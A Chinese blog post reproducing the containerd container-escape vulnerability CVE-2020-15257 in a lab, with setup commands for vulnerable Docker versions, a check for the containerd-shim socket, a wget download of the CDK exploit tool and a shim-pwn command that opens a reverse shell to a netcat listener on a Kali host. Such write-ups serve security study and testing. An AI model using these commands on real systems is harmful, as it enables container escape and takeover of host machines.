Docker 容器逃逸漏洞(CVE-2020-15257)复现

文章目录环境准备(安装docker)漏洞复现环境准备(安装docker)这里我使用的新安装的ubuntu安装一个docker复现漏洞，然后用同网段的kali接收shell首先给ubuntu换源(换过了就不用换了)vim /etc/apt/sources.list#添加源#中科大源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-fr

天问_Herbert555

4531人浏览 · 2021-10-03 10:46:47

天问_Herbert555 · 2021-10-03 10:46:47 发布

环境准备(安装docker)

这里我使用的新安装的ubuntu安装一个docker复现漏洞，然后用同网段的kali接收shell
在这里插入图片描述

首先给ubuntu换源(换过了就不用换了)

vim /etc/apt/sources.list

#添加源
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#然后执行
sudo apt-get update

#报错如下
Err:1 http://mirrors.ustc.edu.cn/kali kali-rolling InRelease                   
  The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED444FF07D8D0BF6

# 把这个公钥添加到服务器就行了
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6

#然后执行
sudo apt-get update

安装有漏洞的docker版本

sudo apt-get install ca-certificates curl software-properties-common
# 添加官方GPG密钥，这一步可能需要root用户执行，ubuntu执行，sudo passwd root 然后su root即可
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
# 设置稳定的存储库
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
# 安装指定版本的docker
sudo apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

此时查看containerd版本

docker version

漏洞影响版本
containerd < 1.4.3
containerd < 1.3.9

在这里插入图片描述

漏洞复现

下载一个容器，docker换源

docker pull ubuntu:18.04

通过--net=host 作为启动参数来运行并进入一个容器：

sudo docker run -itd --net=host ubuntu:18.04 /bin/bash

进入容器

sudo docker exec -it <容器id> /bin/bash

接着在容器内执行

cat /proc/net/unix|grep -a "containerd-shim"

可看到抽象命名空间Unix域套接字
在这里插入图片描述
Poc地址，https://github.com/Xyntax/CDK/releases/tag/0.1.6

下载exp并实现反弹shell，实现docker逃逸

wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz
tar -zxvf cdk_v0.1.6_release.tar.gz
./cdk_linux_amd64 run shim-pwn 192.168.170.139 6666

在这里插入图片描述

kali开启监听

nc -lvnp 6666

成功实现逃逸获取主机shell
在这里插入图片描述

向您推荐>>Eolink开发者社区

权威｜前沿｜技术｜干货｜国内首个API全生命周期开发者社区

更多推荐

沃云统一开发平台介绍

沃云集成平台研发平台介绍1.平台优势2.平台原理3.研发平台使用方法4.遇到的问题5.现阶段实现的功能6.后续需要补充的功能和优化内容研发平台介绍1.平台优势解决孤岛式应用，实现能力共享；现有系统框架过于复杂，跨系统业务处理成本居高不下，协同服务共享，降低运维成本；提高项目应用资源监控能力，改善资源利用率；业务微服务化，快速发布、快速部署，快速响应业务需求变化；沃云平台不仅提供了自动化的、可快速部

云原生

(20200916 Solved)docker-compose up创建容器自动退出

问题描述如题，创建容器后自动退出了。并且docker start container无效解决方案原因是缺失了控制终端的配置，需要在docker-compose.yml中增加tty:true ，有时候这样也不行，需要再增加一个command:/bin/bash，命令不一定是这个，需要是一个不会退出的命令，然后用-d后台启动容器。Referencesdocker-compose启动容器后自动退出...

云原生

基于docker的test-containers环境百宝箱

笔者语录：我开了个公众号【Java你我他】，欢迎大家关注。在很多时候，程序猿们更关注代码本身，而不愿意把时间花费在环境搭建上，这也是Docker变得越来越受欢迎的原因之一。test-containe是Docker生态圈中的一颗新星，其主要针对测试领域、背靠Docker实现环境百宝箱功能。 test-containers：你要的环境，我都有~ 假设我们现在需要一个redis-clust